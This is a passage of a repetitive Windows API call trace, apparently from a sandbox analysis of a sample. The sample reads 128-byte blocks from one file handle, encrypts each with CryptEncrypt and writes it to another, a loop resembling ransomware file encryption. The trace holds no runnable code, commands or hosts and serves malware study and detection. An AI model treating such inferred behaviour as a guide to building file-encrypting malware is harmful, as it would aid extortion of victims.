hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.673] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.673] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.673] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.673] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.673] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.673] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.673] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.673] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.673] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.673] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.673] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.673] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.673] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.673] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.673] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.673] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.673] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.673] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.674] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.674] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.674] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.674] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.674] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.674] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.674] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.674] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.674] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.674] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.674] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.674] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.674] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.674] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.674] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.674] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.674] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.674] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.674] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.674] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.674] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.674] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.674] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.674] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.675] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.675] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.675] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.675] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.675] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.675] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.675] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.675] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.675] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.675] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.675] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.675] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.675] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.675] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.675] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.675] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.675] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.675] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.675] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.675] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.675] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.675] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.675] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.676] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.676] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.676] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.676] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.676] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.676] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.676] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.676] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.676] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.676] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.676] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.676] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.676] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.676] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.676] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.676] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.676] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.676] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.676] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.676] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.676] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.676] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.676] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.677] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.677] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.677] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.677] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.677] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.677] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.677] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.677] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.677] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.677] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.677] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.677] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.677] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.677] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.677] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.677] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.677] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.677] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, 